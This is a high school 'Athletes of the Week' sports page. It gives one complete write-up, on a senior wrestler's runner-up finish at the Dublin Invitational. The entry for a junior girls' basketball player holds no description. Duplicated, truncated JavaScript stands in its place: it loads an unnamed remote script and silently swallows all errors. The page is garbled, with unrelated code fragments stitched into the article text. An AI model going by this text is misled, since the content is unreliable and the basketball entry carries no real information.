Athletes of the Week
Kemba Credit Union Athletes of the Week 12/30/2019-1/5/2020
Ben Whatley
Senior, Wrestling
Ben was the runner-up in the 138 pound division at the 21 team Dublin Invitational on Saturday. Before losing in the finals he won his first four matches by pin (37 seconds), pin (1 minute 11 seconds), major decision (14-4), and decision (9-3). He was the highest finishing placer on the Lakota West team.
Kailyn Dudukovich
Junior, Girls Basketball
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();